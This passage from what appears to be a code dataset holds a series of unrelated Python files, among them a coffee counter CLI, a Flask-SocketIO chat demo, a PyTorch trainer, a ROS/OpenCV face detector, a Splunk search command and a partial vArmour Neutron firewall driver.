a number!\")\n\n while when_to_stop > 0:\n m, s = divmod(when_to_stop, 60)\n h, m = divmod(m, 60)\n time_left = (str(h).zfill(2) + \":\" + str(m).zfill(2) + \":\" + str(s).zfill(2))\n print(time_left + \"\\r\", end=\"\")\n time.sleep(1)\n when_to_stop -= 1\n\n\nsubject = input(\"Enter Subject Line: \")\nmsg = input(\"Enter message: \")\nt = input(\">> \")\ntimer(t)\nprint(\"Sending Email\")\nsend_email(subject, msg)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"88948735","text":"#!/usr/bin/env python3\n# -*- coding: utf8 -*-\n\"\"\"Coffeethon.py: Help you keep track of the number of cup of coffee drank.\"\"\"\n\nimport sys\nimport getopt\n\n__author__ = \"Tom Celestin\"\n__copyright__ = \"Copyright 2018, Planet Earth\"\n\ndef printCups(operation, amount, isWatch):\n if isWatch == False:\n if amount == 1:\n print(\"You \" + operation + \" \" + str(amount) + \" cup of coffee\")\n else:\n print(\"You \" + operation + \" \" + str(amount) + \" cups of coffee\")\n else:\n if amount == 1:\n print(\"Today you drank \" + str(amount) + \" cup of coffee\")\n else:\n print(\"Today you drank \" + str(amount) + \" cups of coffee\")\ndef manage_file(filename, sum, number):\n \"\"\"Change value of the coffee counter.\"\"\"\n number = int(number)\n file = open(filename, \"r\")\n current = int(file.read())\n if sum is True:\n current += number\n printCups(\"added\", number, False)\n else:\n current -= number\n printCups(\"removed\", number, False)\n file.close()\n file = open(filename, \"w\")\n file.write(str(current))\n file.close()\n\n\ndef clear(filename):\n \"\"\"Reset the counter to 0.\"\"\"\n file = open(filename, \"w\")\n file.write(\"0\")\n file.close()\n\n\ndef watch(filename):\n \"\"\"Display the counter in cool way.\"\"\"\n file = open(filename, \"r\")\n current = file.read()\n printCups(\"\", int(current), True)\n for i in range(int(current)):\n print(\"☕️\", end=\" \")\n file.close()\n\n\ndef main(argv):\n \"\"\"Main function.\"\"\"\n filename = \"/tmp/coffeethon.txt\"\n\n try:\n file = open(filename)\n except IOError:\n # If not exists, create the file\n file = open(filename, 'w+')\n file.write(\"0\")\n file.close()\n try:\n opts, args = getopt.getopt(\n argv,\n \"harcw\",\n [\n \"add\",\n \"remove\",\n \"clear\",\n \"watch\"\n ]\n )\n except getopt.GetoptError as e:\n print(str(e))\n print('coffeethon.py --add [number]')\n print('coffeethon.py --remove [number]')\n print('coffeethon.py --clear')\n print('coffeethon.py --watch')\n sys.exit(2)\n for opt, arg in opts:\n number = 1\n if len(sys.argv) > 2:\n number = sys.argv[2]\n if opt == '-h':\n print('coffeethon.py --add [number]')\n print('coffeethon.py --remove [number]')\n print('coffeethon.py --clear')\n print('coffeethon.py --watch')\n sys.exit()\n elif opt in (\"-a\", \"--add\"):\n manage_file(filename, True, number)\n elif opt in (\"-r\", \"--remove\"):\n manage_file(filename, False, number)\n elif opt in (\"-c\", \"--clear\"):\n clear(filename)\n elif opt in (\"-w\", \"--watch\"):\n watch(filename)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"coffeethon.py","file_name":"coffeethon.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"417765100","text":"# -*- coding: utf-8 -*-\n# (c) 2008 Gael Pasgrimaud and contributors\n# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php\nfrom setuptools import setup, find_packages\nimport sys, os\n\nversion = '1.2'\n\nlong_description = ''\nlong_description += open('README.txt').read()\nlong_description += '\\n'\n\nfor filename in ('description.txt',\n 'upload.txt',\n 'storage.txt',\n 'paste-factories.txt',\n 'jquery-plugin.txt',\n 'contributors.txt'):\n long_description += open(os.path.join('docs', filename)).read()\n long_description += '\\n'\n\n\nrequires = [\n 'setuptools',\n 'Paste',\n 'WebOb',\n ]\n\nif sys.version_info < (2, 6):\n requires.append('simplejson')\n\nsetup(name='gp.fileupload',\n version=version,\n description=\"A WSGI middleware to get some stats on large files upload,\"\n \"and provide a progress bar for your users\",\n long_description=long_description + \\\n 'News\\n****\\n\\n' +\n open('CHANGES.txt').read(),\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Environment :: Web Environment\",\n \"Programming Language :: Python\",\n \"Programming Language :: JavaScript\",\n ],\n keywords='wsgi middleware upload progress bar',\n author='Gael Pasgrimaud',\n author_email='gael@gawel.org',\n url='http://www.gawel.org/docs/gp.fileupload/',\n license='MIT',\n namespace_packages=['gp'],\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n package_data={'gp/fileupload': ['static/*',]},\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [paste.app_factory]\n sample = gp.fileupload.sampleapp:make_app\n\n [paste.filter_app_factory]\n main = gp.fileupload:make_app\n demo = gp.fileupload.demo:make_demo\n \"\"\",\n )\n\n","sub_path":"pypi_install_script/gp.fileupload-1.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"257714515","text":"import re\nimport time\n\n#This file takes the information in the interlanguage_links.tsv file and creates a dictionary d\nd = {}\ncode_regex = '(Q\\S.*?)(?:\\s)'\ntitle_regex = '(?:\\s.*?)(?:\\S.*?)(?:\\s.*?)(\\S.*)'\nlanguage_regex = '(?:\\s.*?)(\\S.*?)(?:\\s.*)'\n\ndef get_d():\n return d\n \ndef make_d():\n start = time.time()\n f = open('interlanguage_links.tsv', 'r')\n code = ''\n for line in f:\n language = re.findall(language_regex, line)[0]\n if (language == 'en' or language == 'es'):\n code = re.findall(code_regex, line)[0]\n title = re.findall(title_regex, line)[0]\n d[title] = code\n #print (code)\n end = time.time()\n print (end-start)\n \ndef Qcode_by_title(title):\n q = d[title]\n return q\n \n","sub_path":"interlanguage.py","file_name":"interlanguage.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"207643052","text":"import os\nfrom rotator.rotator import (\n Rotator,\n rotator_settings\n)\nimport pytest\n\n@pytest.mark.asyncio\nasync def test_rotator_must_raise_exception_if_file_does_not_exist():\n with pytest.raises(FileNotFoundError):\n await Rotator().rotate('not/a/real/file/path.log')\n\n\n@pytest.mark.asyncio\nasync def test_rotator_must_not_rotate_small_log_file(\n tmp_log,\n):\n open(tmp_log, 'a').close()\n rotation_result = await Rotator().rotate(tmp_log)\n assert rotation_result == (False, tmp_log)\n\n\n@pytest.mark.asyncio\nasync def test_rotator_must_rotate_big_log_file(\n mocker,\n tmp_log,\n):\n with open(tmp_log, 'w') as log:\n log.write(\n str(os.urandom(rotator_settings.MAX_LOG_SIZE + 1))\n )\n from rotator.rotator import os as rotator_os\n rename = mocker.patch.object(rotator_os, 'rename', mocker.Mock())\n system = mocker.patch.object(rotator_os, 'system', mocker.Mock())\n rotation_result = await Rotator().rotate(tmp_log)\n assert rotation_result == (True, tmp_log + '_old')\n assert rename.called_once_with(tmp_log, tmp_log + '_old')\n assert system.called_once_with('kill -USR1 `cat /var/run/nginx.pid`')\n","sub_path":"tests/test_rotator.py","file_name":"test_rotator.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"366829587","text":"# -*- coding: utf-8 -*-\n\n# @Time : 2019/10/16\n# @Author : Lattine\n\n# ======================\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom config import Config\nfrom data_helper import CustomDataset\nfrom utils import AveragerMeter\nfrom models import Model\n\n\nclass Trainer:\n def __init__(self, config):\n self.config = config\n self.net = Model()\n self.writer = SummaryWriter(self.config.logs_path)\n\n def train(self):\n train_data = CustomDataset(config.train_data_lmdb, is_train=True)\n test_data = CustomDataset(config.test_data_lmdb, is_train=True)\n train_data_loader = DataLoader(train_data, batch_size=self.config.batch_size, shuffle=True)\n test_data_loader = DataLoader(test_data, batch_size=self.config.batch_size, shuffle=True)\n\n optimizer = optim.Adam(self.net.parameters(), self.config.lr)\n criterion = nn.CrossEntropyLoss()\n\n loss_avg = AveragerMeter()\n best_eval_loss = 100.0\n for epoch in range(self.config.epoches):\n self.net.train()\n for imgs, labs in train_data_loader:\n optimizer.zero_grad()\n\n preds = self.net(imgs)\n labs = labs.squeeze() # [[0], [1]] => [0, 1]\n loss = criterion(preds, labs)\n loss_avg.add(loss)\n\n loss.backward()\n optimizer.step()\n print(f\"Epoch {epoch + 1}: Loss:{loss_avg.val()}\")\n self.writer.add_scalar(\"Train Loss\", loss_avg.val(), epoch + 1)\n loss_avg.reset()\n\n eval_loss, eval_acc = self.evaluation(test_data_loader, criterion)\n print(f\"Test loss: {eval_loss.val()}, Accuray: {eval_acc * 100}%\")\n self.writer.add_scalar(\"Test Loss\", eval_loss.val(), epoch + 1)\n self.writer.add_scalar(\"Accuracy\", eval_acc, epoch + 1)\n\n # 保存模型 最好的Validation模型\n if eval_loss.val() < best_eval_loss:\n best_eval_loss = eval_loss.val()\n torch.save(self.net.state_dict(), self.config.save_ckpt_file + f\"-{epoch + 1}\")\n\n def evaluation(self, data_loader, criterion, max_iter=100):\n self.net.eval()\n data_iter = iter(data_loader)\n n_correct = 0\n loss_avg = AveragerMeter()\n max_iter = min(max_iter, len(data_loader))\n for _ in range(max_iter):\n images, labels = data_iter.next()\n with torch.no_grad():\n preds = self.net(images)\n labels = labels.squeeze()\n loss = criterion(preds, labels)\n loss_avg.add(loss)\n\n top_val, top_ix = preds.max(-1)\n assert len(top_ix) == len(labels)\n for p, t in zip(top_ix, labels):\n if p == t:\n n_correct += 1\n accuracy = n_correct / (max_iter * self.config.batch_size)\n return loss_avg, accuracy\n\n\nif __name__ == '__main__':\n config = Config()\n p = Trainer(config)\n p.train()\n","sub_path":"VC1_表格图片方向分类/process/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"212235542","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import BookStore\nfrom django.core import serializers\nimport simplejson\n\n# Create your views here.\n\ndef bookstore(request):\n bookstores = BookStore.objects\n return render(request,'bookstore.html', {'bookstores' : bookstores})\n\ndef detail(request, bookstore_id):\n store_detail = get_object_or_404(BookStore, pk = bookstore_id)\n return render(request, 'storedetail.html', {'store' : store_detail})\n\ndef realmap(request):\n bookstores = BookStore.objects.all()\n addr = []\n name = []\n for a in bookstores:\n addr.append(a.addr)\n name.append(a.name)\n addrlist = simplejson.dumps(addr)\n namelist = simplejson.dumps(name)\n return render(request, 'realmap.html', {'bs':bookstores, 'bsaddr' : addrlist, 'bsname' : namelist})","sub_path":"bookmap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"229589205","text":"import sys\nimport splunk\nimport splunklib.client\nimport splunklib.results\nimport splunklib.binding\nfrom splunklib.searchcommands import dispatch, GeneratingCommand, Configuration, Option, Boolean\nimport splunk.mining.dcutils\nfrom asx_lib import ASXLib\nfrom splunk.clilib import cli_common as cli\nimport time\n\n@Configuration(streaming=True, local=True)\nclass ASXUpdate(GeneratingCommand):\n logger = splunk.mining.dcutils.getLogger()\n\n list_all = Option(doc='''\n **Syntax: update_all=\n **Description:** When `true`, retrives all analytics stories from the API.\n Defaults to `false`.\n ''', name='list_all', default=False, validate=Boolean())\n\n story = Option(doc='''\n **Syntax:** **story=****\n **Description:** Story to update.\n ''', name='story', require=False, default=None)\n\n def getURL(self):\n cfg = cli.getConfStanza('asx','settings')\n self.logger.info(\"asxupdate.py - asx_conf: {0}\".format(cfg['api_url']))\n return cfg['api_url']\n\n def generate(self):\n # connect to splunk and start execution\n port = splunk.getDefault('port')\n service = splunklib.client.connect(token=self._metadata.searchinfo.session_key, port=port, owner=\"nobody\",app=\"Splunk_ASX\")\n API_URL = self.getURL()\n asx_lib = ASXLib(service, API_URL)\n self.logger.info(\"asxupdate.py - start\")\n\n if self.list_all:\n self.logger.info(\"asxupdate.py - list all stories\")\n stories = asx_lib.list_analytics_stories()\n for story in stories:\n self.logger.info(\"asxupdate.py - processing story {0}\".format(story['name']))\n\n yield {\n '_time': time.time(),\n 'sourcetype': \"_json\",\n '_raw': {'name': story['name']},\n 'status': \"successfully listed all stories\"\n }\n # only updating specific stories\n if self.story:\n self.logger.info(\"asxupdate.py - stories to update {0}\".format(self.story))\n stories = self.story.split(\",\")\n for story in stories:\n self.logger.info(\"asxupdate.py - updating story {0}\".format(story))\n asx_lib.get_analytics_story(story)\n yield {\n '_time': time.time(),\n 'sourcetype': \"_json\",\n '_raw': story,\n 'status': \"successfully updated story\"\n }\n\n self.logger.info(\"asxupdate.py - COMPLETED\")\n\n def __init__(self):\n super(ASXUpdate, self).__init__()\n\ndispatch(ASXUpdate, sys.argv, sys.stdin, sys.stdout, __name__)\n","sub_path":"bin/asxupdate.py","file_name":"asxupdate.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486870838","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom std_msgs.msg import String\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom sensor_msgs.msg import Image\nimport rospy\nimport time\nimport cv2\n\n#ROS\nrospy.init_node('opencv_publisher')\npub = rospy.Publisher('/cv_info',String,queue_size=2)\n# Create a CascadeClassifier Object\nface_cascade = cv2.CascadeClassifier('/home/ros/Desktop/Drones/ROS_WS/src/drone_project/src/opencv/model/lbpcascade_frontalface_improved.xml')\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.resolution = (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640, 480))\n# allow the camera to warmup\ntime.sleep(0.1)\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n\t# grab the raw NumPy array representing the image, then initialize the timestamp\n\t# and occupied/unoccupied text\n\timage = frame.array\t\n\t\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t# Search the co-ordinates of the image\n\tfaces = face_cascade.detectMultiScale(gray,\n\t\tscaleFactor = 1.1, minNeighbors = 4)\n\tstr_send = \"\"\n\tfor x,y,w,h in faces:\n\t\tstr_send += str(x)+\",\"+str(y)+\",\"+str(w)+\",\"+str(h)+\",\" \t\t\n\t\tprint(str_send)\n\t\tpub.publish(str_send)\n\t\t\n\t\timage = cv2.rectangle(image, (x,y), (x+w,y+h), (0,255,0), 3)\n\t\tcv2.putText(image, 'face', (x, y),\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0), 2) \n\t\t#print(x,\" \",y,\" \",w,\" \",h)\t\n\n\t# show the frame\n\tcv2.imshow(\"Frame\", image)\n\tkey = cv2.waitKey(1) & 0xFF\n\t# clear the stream in preparation for the next frame\n\trawCapture.truncate(0)\n\n\n\t#if the `q` key was pressed, break from the loop\n\tif key == ord(\"q\"):\n\t\tbreak\n","sub_path":"ROS_WS/src/drone_project/src/opencv/cv_image_publisher_rpi_version.py","file_name":"cv_image_publisher_rpi_version.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"226938419","text":"import torch\n\n\ndef calc_mean_std(feat, eps=1e-5):\n \"\"\"\n Calculate the mean and standard deviation of the given feature\n\n Arguments:\n feat (torch.Tensor): The feature to calculate statistics on\n eps (float): A small value added to the variance to avoid division by zero\n\n \"\"\"\n size = feat.size()\n assert (len(size) == 4)\n N, C = size[:2]\n feat_var = feat.view(N, C, -1).var(dim=2) + eps\n feat_std = feat_var.sqrt().view(N, C, 1, 1)\n feat_mean = feat.view(N, C, -1).mean(dim=2).view(N, C, 1, 1)\n return feat_mean, feat_std\n\n\ndef adaptive_instance_normalization(content_feat, style_feat):\n \"\"\"\n AdaIN as presented in Section 5 of Arbitrary Style Transfer in Real-time with Adaptive Instance Normalization by Huang et al.\n \n Arguments:\n content_feat (torch.Tensor): Content feature to normalize\n style_feat (torch.Tensor): Style feature to normalize\n\n \"\"\"\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_mean, style_std = calc_mean_std(style_feat)\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = (content_feat - content_mean.expand(\n size)) / content_std.expand(size)\n return normalized_feat * style_std.expand(size) + style_mean.expand(size)\n\n\ndef _calc_feat_flatten_mean_std(feat):\n \"\"\"\n Return mean and std of feature within channels\n\n Arguments: \n feat (torch.Tensor): Feature to compute mean and std\n\n \"\"\"\n assert (feat.size()[0] == 3)\n assert (isinstance(feat, torch.FloatTensor))\n feat_flatten = feat.view(3, -1)\n mean = feat_flatten.mean(dim=-1, keepdim=True)\n std = feat_flatten.std(dim=-1, keepdim=True)\n return feat_flatten, mean, std\n\n\ndef _mat_sqrt(x):\n \"\"\"\n Compute square root of matrix\n\n Arguments: \n x (torch.Tensor): Matrix to compute square root of\n\n \"\"\"\n U, D, V = torch.svd(x)\n return torch.mm(torch.mm(U, D.pow(0.5).diag()), V.t())\n\n\ndef coral(source, target):\n \"\"\"\n Correlation Alignment Loss as shown in Deep CORAL: Correlation Alignment for Deep Domain Adaptation\n \n Arguments:\n source (torch.Tensor): Source feature\n target (torch.Tensor): Target feature\n \"\"\"\n source_f, source_f_mean, source_f_std = _calc_feat_flatten_mean_std(source)\n source_f_norm = (source_f - source_f_mean.expand_as(\n source_f)) / source_f_std.expand_as(source_f)\n source_f_cov_eye = \\\n torch.mm(source_f_norm, source_f_norm.t()) + torch.eye(3)\n\n target_f, target_f_mean, target_f_std = _calc_feat_flatten_mean_std(target)\n target_f_norm = (target_f - target_f_mean.expand_as(\n target_f)) / target_f_std.expand_as(target_f)\n target_f_cov_eye = \\\n torch.mm(target_f_norm, target_f_norm.t()) + torch.eye(3)\n\n source_f_norm_transfer = torch.mm(\n _mat_sqrt(target_f_cov_eye),\n torch.mm(torch.inverse(_mat_sqrt(source_f_cov_eye)),\n source_f_norm)\n )\n\n source_f_transfer = source_f_norm_transfer * \\\n target_f_std.expand_as(source_f_norm) + \\\n target_f_mean.expand_as(source_f_norm)\n\n return source_f_transfer.view(source.size())\n","sub_path":"style_transfer/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"512574202","text":"import unittest\n\n\ndef merge_ranges(meetings):\n\n # Merge meeting ranges\n meetings = sorted(meetings,key=lambda x:x[0])\n #print(meetings)\n lst = []\n #print(meetings.pop(0))\n curr_val = list(meetings.pop(0))\n \n #append to the list only when no intersection otherwise keep on updating the curr_val\n while meetings!= []:\n #this \"if\" handles the case where the intervals are not overlapping\n if curr_val[1]=meetings[0][0]:\n curr_val[1]=max(curr_val[1],meetings[0][1])\n meetings.pop(0)\n else:\n #print('what!')\n lst.append((curr_val[0],curr_val[1]))\n \n #for the one case where ther eis only one element \n #zero element case can be handled above initially (before entering while)\n return lst\n\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n def test_meetings_overlap(self):\n actual = merge_ranges([(1, 3), (2, 4)])\n expected = [(1, 4)]\n self.assertEqual(actual, expected)\n\n def test_meetings_touch(self):\n actual = merge_ranges([(5, 6), (6, 8)])\n expected = [(5, 8)]\n self.assertEqual(actual, expected)\n\n def test_meeting_contains_other_meeting(self):\n actual = merge_ranges([(1, 8), (2, 5)])\n expected = [(1, 8)]\n self.assertEqual(actual, expected)\n\n def test_meetings_stay_separate(self):\n actual = merge_ranges([(1, 3), (4, 8)])\n expected = [(1, 3), (4, 8)]\n self.assertEqual(actual, expected)\n\n def test_multiple_merged_meetings(self):\n actual = merge_ranges([(1, 4), (2, 5), (5, 8)])\n expected = [(1, 8)]\n self.assertEqual(actual, expected)\n\n def test_meetings_not_sorted(self):\n actual = merge_ranges([(5, 8), (1, 4), (6, 8)])\n expected = [(1, 4), (5, 8)]\n self.assertEqual(actual, expected)\n\n def test_one_long_meeting_contains_smaller_meetings(self):\n actual = merge_ranges([(1, 10), (2, 5), (6, 8), (9, 10), (10, 12)])\n expected = [(1, 12)]\n self.assertEqual(actual, expected)\n\n def test_sample_input(self):\n actual = merge_ranges([(0, 1), (3, 5), (4, 8), (10, 12), (9, 10)])\n expected = [(0, 1), (3, 8), (9, 12)]\n self.assertEqual(actual, expected)\n\n\nunittest.main(verbosity=2)","sub_path":"MergeInterval.py","file_name":"MergeInterval.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134563792","text":"import json\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO, send, emit, join_room, leave_room\nfrom flask import render_template, request\nimport threading\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\nconnected_clients = {}\n\nglobal stop_event\nstop_event = threading.Event()\n\ndef long_running_task():\n for _ in range(1000):\n socketio.emit('count', json.dumps({'count': _}), namespace='/count')\n socketio.sleep(1)\n print('Counting', _)\n if stop_event.is_set():\n break\n\n\n@app.route('/', methods=['GET'])\ndef handle_root():\n return render_template('index.html')\n\n\n@app.route('/push', methods=['GET'])\ndef handle_push():\n return json.dumps([str(v) for k, v in connected_clients.items()])\n\n\n@app.route('/push/', methods=['GET'])\ndef handle_push_message(client_id):\n if client_id not in connected_clients.values():\n raise Exception('Client is offline')\n message = request.args.to_dict()['message']\n print('Send [{}] message[{}]'.format(client_id, message))\n socketio.emit('chat message', message, room=client_id, namespace='/chat')\n return 'OK'\n\n\n@socketio.on('connect', namespace='/chat')\ndef handle_chat_connect():\n print('Received connect: ' + str(request.sid))\n\n\n@socketio.on('disconnect', namespace='/chat')\ndef handle_chat_disconnect():\n if request.sid in connected_clients:\n username = connected_clients[request.sid]\n leave_room(username)\n del connected_clients[request.sid]\n socketio.emit('chat message', '{} has left the chat'.format(username), \n namespace='/chat', broadcast=True)\n print('Received disconnect: ' + str(request.sid))\n\n\n@socketio.on('chat join', namespace='/chat')\ndef handle_chat_join(data):\n print('Joined chat: ' + str(data))\n if data and 'username' in data:\n username = data['username']\n connected_clients[request.sid] = username\n join_room(username)\n \n socketio.emit('chat message', '{} joined the chat'.format(username), \n namespace='/chat', broadcast=True)\n\n\n@socketio.on('chat message', namespace='/chat')\ndef handle_chat_message(data):\n print('Received chat message: ' + str(data))\n if data:\n socketio.emit('chat message', \"{}: {}\".format(data['username'], data['message']),\n namespace='/chat', broadcast=True)\n\n\n@socketio.on('connect', namespace='/count')\ndef handle_counter_connect():\n if not connected_clients:\n global stop_event\n stop_event = threading.Event()\n t = socketio.start_background_task(long_running_task)\n print('Listening to the counter: {} on Thread[{}]'.format(request.sid, t))\n else:\n print('Listening to the counter: {}'.format(request.sid))\n connected_clients[request.sid] = request.sid\n\n\n@socketio.on('disconnect', namespace='/count')\ndef handle_counter_disconnect():\n if request.sid in connected_clients:\n del connected_clients[request.sid]\n if not connected_clients:\n stop_event.set()\n print('Stopped listening to the counter: ' + str(request.sid))\n\n\n@app.teardown_appcontext\ndef _teardown(*args, **kwargs):\n yield\n stop_event.set()\n\nif __name__ == '__main__':\n socketio.run(app)\n","sub_path":"socket.io/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"562082184","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright 2013 Big Switch Networks, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# @author: Sumit Naiksatam, sumitnaiksatam@gmail.com, Big Switch Networks, Inc.\n# @author: Gary Duan, gduan@varmour.com, vArmour Networks\n\nfrom neutron import manager\nfrom neutron.openstack.common import log as logging\nfrom neutron.plugins.common import constants as consts\nfrom neutron.plugins.varmour.common import varmour_constants as va_consts\nfrom neutron.plugins.varmour.common import varmour_utils as va_utils\nfrom neutron.services.firewall.plugin_drivers import plugin_driver_base\n\nLOG = logging.getLogger(__name__)\n\n\nclass vArmourFWDriver(plugin_driver_base.FWaaSPluginDriverBase):\n\n supported_extension_aliases = [\"fwaas\"]\n\n va_alias = va_consts.VARMOUR_FW_DRIVER_ALIAS\n\n def __init__(self, plugin):\n self.plugin = plugin\n self.l3_plugin = None\n self.l3_driver = None\n self.l3_provider = None\n\n @property\n def _varmour_l3_driver(self):\n if not self.l3_driver:\n self.l3_driver, self.l3_provider = va_utils.get_varmour_l3_driver()\n return self.l3_driver\n\n @property\n def _varmour_l3_provider(self):\n if not self.l3_provider:\n self.l3_driver, self.l3_provider = va_utils.get_varmour_l3_driver()\n return self.l3_provider\n\n @property\n def _l3_plugin(self):\n if not self.l3_plugin:\n self.l3_plugin = manager.NeutronManager.get_service_plugins().get(\n consts.L3_ROUTER_NAT)\n return self.l3_plugin\n\n def _set_firewall_status(self, context, fw):\n if self._is_firewall_enabled(fw):\n status = consts.ACTIVE\n else:\n status = consts.INACTIVE\n self.plugin.set_firewall_status(context, fw['id'], status)\n\n def _is_firewall_enabled(self, fw):\n return fw['firewall_policy_id'] and fw['admin_state_up']\n\n def _add_task(self, context, action, fw_id, params, router_id=None):\n l3_driver = self._varmour_l3_driver\n l3_provider = self._varmour_l3_provider\n if not l3_driver:\n return\n\n fw = self.plugin._get_firewall(context, fw_id)\n if router_id:\n r = self._l3_plugin._get_router(context, router_id)\n l3_driver._add_task(action, r, params=params)\n else:\n routers = self._l3_plugin.get_routers(context)\n for r in routers:\n # only apply to varmour routers\n if (r.get('provider') == l3_provider and\n r['tenant_id'] == fw['tenant_id']):\n l3_driver._add_task(action, r, params=params)\n\n def create_router(self, context, router_id):\n for fw in self.plugin.get_firewalls_for_driver(context, self):\n fw_dict = self.plugin.make_firewall_dict_with_rules(context,\n fw['id'])\n self._add_task(context, va_consts.ACT_CREATE_FIREWALL, fw['id'],\n {'fw_id': fw['id'],\n 'rules': fw_dict['firewall_rule_list']},\n router_id=router_id)\n\n def delete_router(self, context, router_id):\n for fw in self.plugin.get_firewalls_for_driver(context, self):\n self._add_task(context, va_consts.ACT_DELETE_FIREWALL, fw['id'],\n {'fw_id': fw['id']},\n router_id=router_id)\n\n def _create_firewall(self, context, fw):\n fw_dict = self.plugin._make_firewall_dict_with_rules(context,\n fw['id'])\n self._add_task(context, va_consts.ACT_CREATE_FIREWALL, fw['id'],\n {'fw_id': fw['id'],\n 'rules': fw_dict['firewall_rule_list']})\n\n def create_firewall(self, context, fw):\n if self._is_firewall_enabled(fw):\n self._create_firewall(context, fw)\n\n self._set_firewall_status(context, fw)\n\n def _delete_firewall(self, context, old_fw):\n self._add_task(context,\n va_consts.ACT_DELETE_FIREWALL, old_fw['id'],\n {'fw_id': old_fw['id']})\n\n def delete_firewall(self, context, old_fw):\n if self._is_firewall_enabled(old_fw):\n self._delete_firewall(context, old_fw)\n\n self.plugin.firewall_deleted(context, old_fw['id'])\n\n def update_firewall(self, context, old_fw, fw):\n old_enabled = self._is_firewall_enabled(old_fw)\n enabled = self._is_firewall_enabled(fw)\n\n if old_enabled and not enabled:\n self._delete_firewall(context, old_fw)\n elif not old_enabled and enabled:\n self._create_firewall(context, fw)\n elif (old_enabled and enabled and\n old_fw['firewall_policy_id'] != fw['firewall_policy_id']):\n self._delete_firewall(context, old_fw)\n self._create_firewall(context, fw)\n\n self._set_firewall_status(context, fw)\n\n def update_firewall_policy(self, context, old_fwp, fwp, fw_list):\n same = True\n if len(fwp['firewall_rules']) == len(old_fwp['firewall_rules']):\n for idx, rid in enumerate(fwp['firewall_rules']):\n if old_fwp['firewall_rules'][idx] != rid:\n same = False\n break\n else:\n same = False\n\n for fw_id in fw_list:\n if not same:\n fw = self.plugin.get_firewall(context, fw_id)\n if self._is_firewall_enabled(fw):\n self._deleta_firewall(context, fw)\n self._create_firewall(context, fw)\n self._set_firewall_status(context, fw)\n else:\n fw = self.plugin._get_firewall(context, fw_id)\n self._set_firewall_status(context, fw)\n\n def update_firewall_rule(self, context, fwp, fwr, fw_list):\n for fw_id in fw_list:\n self._add_task(context, va_consts.ACT_MODIFY_FIREWALL_RULE, fw_id,\n {'rule': fwr})\n fw = self.plugin._get_firewall(context, fw_id)\n self._set_firewall_status(context, fw)\n\n def insert_rule(self, context, fwp, fwr, before, ref_fwr_id, fw_list):\n for fw_id in fw_list:\n self._add_task(context, va_consts.ACT_INSERT_FIREWALL_RULE, fw_id,\n {'rule': fwr,\n 'before': before,\n 'refer': ref_fwr_id})\n fw = self.plugin._get_firewall(context, fw_id)\n 